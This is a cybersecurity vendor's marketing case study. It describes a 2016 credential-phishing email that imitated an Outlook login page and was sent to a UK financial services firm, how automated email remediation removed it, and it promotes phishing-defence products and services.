Have Questions? Call or Text Your Cybersecurity Experts 7 Days a Week! (307) 999-7755

ELIMINATING TARGETED PHISHING EMAIL ATTACK ON FINANCIAL SERVICES COMPANY THROUGH AUTOMATION AND AWARENESS

Cybersecurity is an important element in every employees daily tasks. If an employee, contractor or vendor has access to your email. You should be implementing an email phishing and training awareness program.

The financial services industry is a prime target for cybercrime, with hackers targeting financial services firms 300 percent more than any other sector. A common and, frankly, simple method cyber criminals use to access an enterprise’s confidential and personal information is through phishing attacks. In fact, phishing attacks surged by 250 percent in the first quarter of 2016 - the highest ever since 2004, according to the Anti-Phishing Working Group (APWG).

A financial services company requesting to remain anonymous, located in the United Kingdom, services both small and medium sized businesses (SMB) and enterprises across Europe, the Middle East and Africa. As such, the company must comply with industry standards to ensure its company and its customers’ data is secure. However, regulations are often far behind today’s motivated and agile cyber criminals determined to hack into organizations’ networks for financial gain.

IronTraps™ is a patent-pending, automatic phishing email incident response module, built to empower skilled and vigilant employees to report ongoing attacks, followed by an enterprise-wide remediation response. Learn More

While the company had traditional defenses in place, such as anti-virus, SandBox, Firewalls, IPS and spam filters, it recognized that these phishing remediation solutions were ineffective. Therefore, in early 2016, the company selected IRONSCALES as a means to proactively defend against phishing attacks and lead the company’s anti-phishing awareness and immediate response effort.

Employees underwent IronSchool – IRONSCALES’ employee awareness program – in which its simulation program contains a comparable scenario in order to train employees to successfully navigate similar phishing, attacks.

In addition, IronTraps, the automated phishing email response solution, was immediately deployed on all company endpoints.

THE ATTACK

On July 11, 2016 at 10:58am, a malicious and sophisticated email phishing campaign targeted the financial services company, with the potential to spread to all of its employees, customers, third-party vendors and partners across the globe. The email’s subject line was titled “BAN009/0002 Bank of Ireland” and contained an HTML file named ‘Report_ Template.html.’ In addition, the deceptive HTML file contained a perfect mockup page of a Microsoft Outlook Web Access (OWA) login page in an attempt to steal user credentials.

Attackers are commonly using the social media login pages that we know, like and trust to mask their attacks.

Once the email was opened and the file was downloaded, the attacker then had the opportunity to steal users’ information. To do so, the attacker manipulated the email to cause some versions of Microsoft Outlook (2013) to crash. To reduce suspicions from currently logged-in users, a pop-up window appeared with the text “Due to version update logout was enforced” and the user were redirected to a fake OWA login page, created by the attacker, to submit his/her credentials.

Did you notice that the attackers are using common behaviors to stimulate trust.

THE RESPONSE

Within five minutes of the first emails arrival, an employee reported the attack as suspicious through IRONSCALES active protection Email Guardian Microsoft Outlook button, a one-click process to the IRONSCALES system. At this point, 46 mailboxes were affected.

image


Immediately, IRONSCALES automatic remediation process was triggered and IronTraps automatically deleted the suspicious email from the 46 affected mailboxes and prevented spread of the phishing attack to any other mailboxes.

This prevents other employees clicking on the email.

During the seven minutes between detection and completion of remediation, IronTraps secured ALL mailboxes and protected ALL of the company’s employees from unintentionally sharing credentials with the hackers. Ultimately, IRONSCALES completely removed the threat from all mailboxes in 12 minutes and prevented significant financial and reputational damages to the company.

The ChatFortress Guardian program provides you with real-time human virtual security analyst that are responding to all email reports to verify and validate the attacks. This provides you with an additional layer of security and protection without having to burden your existing IT staff.

image


About ChatFortress and Ironsales Automation and Awareness for Email Phishing

Globally, phishing attacks have evolved from an occasional annoyance into a persistent epidemic. In fact, increasingly sophisticated and highly targeted phishing schemes have essentially transformed every enterprise employee into a primary threat vector. Most enterprises today are cognizant of the financial, reputational and even physical risks of phishing, however, few have modified their defenses to meet the complexity of the modern threat landscape

IRONSCALES is the world’s first and only anti-email phishing technology to combine human intelligence with machine learning. Our suite of technologies work together to prevent, detect and respond automatically to today’s sophisticated email phishing attacks using a multi-layered and automated approach.

IRONSCALES ensures that employees are prepared to take an active role in protecting the integrity of their organizations, while reinforcing their efforts with machine learning technology that can automatically defend enterprises from attacks in real-time.

When a phishing attack is automatically detected or reported, the following sequence of events is triggered:

image
  1. An automatic notification is sent to both the security team and IRONSCALES’ servers.
  2. IronTraps then automatically executes a comprehensive phishing forensic examination of the suspicious email using our integrated Multi-AV and Sandbox Scan. Working in conjunction with IRONSCALES’s advanced technology, IronTraps analyzes the number and skill ranking of the reporter, in addition to other proprietary analytics, which determines the most appropriate mitigation or remediation response.
  3. Once the attack is verified, an automatic remediation response is initiated consisting of an enterprise-wide removal of all malicious emails.

ChatFortress provides clients with a complete automated solution for identifying and removing email phishing and malware related attacks. If you would like more information visit www.StopEmailPhishing.com

If you want to know more about our Virtual Email Security Officer solution please contact our team.

ChatFortress Eliminates Bank Transfer Wire Fraud and Eliminates Email Phishing Attacks!

Helping you verify the device and the person you're sharing wire information with via our secure chat platform. When you need to validate the person you are sending information you need ChatFortress communication. To speak with a ChatFortress Agent call (307) 999-7755. If you want a demo you can Schedule a ChatFortress demo here.